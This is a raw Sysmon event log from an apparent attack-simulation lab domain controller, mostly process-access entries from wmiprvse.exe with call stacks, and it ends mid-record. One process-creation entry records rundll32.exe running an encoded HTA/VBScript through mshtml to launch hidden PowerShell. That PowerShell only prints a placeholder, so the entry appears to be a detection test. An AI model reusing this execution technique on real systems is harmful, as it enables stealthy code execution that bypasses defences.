15:59:39.303{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026705Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.303{7901BC46-4987-6008-1000-00000000A301}11601836C:\Windows\system32\svchost.exe{7901BC46-5368-6008-6806-00000000A301}3256C:\Windows\System32\rundll32.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027102Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000027101Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.997{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXE"C:\Windows\System32\rundll32.exe" about:"\..\mshtml,RunHTMLApplication "%%3Chta:application%%3E%%3Cscript%%20language="VBScript"%%3EClose(Execute("CreateObject(""Wscript.Shell"").Run%%20""powershell.exe%%20-nop%%20-Command%%20Write-Host%%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%%20Start-Sleep%%20-Seconds%%202;%%20exit"",0,true"))%%3C/script%%3EC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000027100Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536B-6008-7006-00000000A301}7828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027099Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536B-6008-6F06-00000000A301}6840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027098Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027097Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027096Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027095Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027094Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027093Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027092Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027091Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027090Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027089Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027088Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027087Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027086Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027085Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027084Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.975{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+11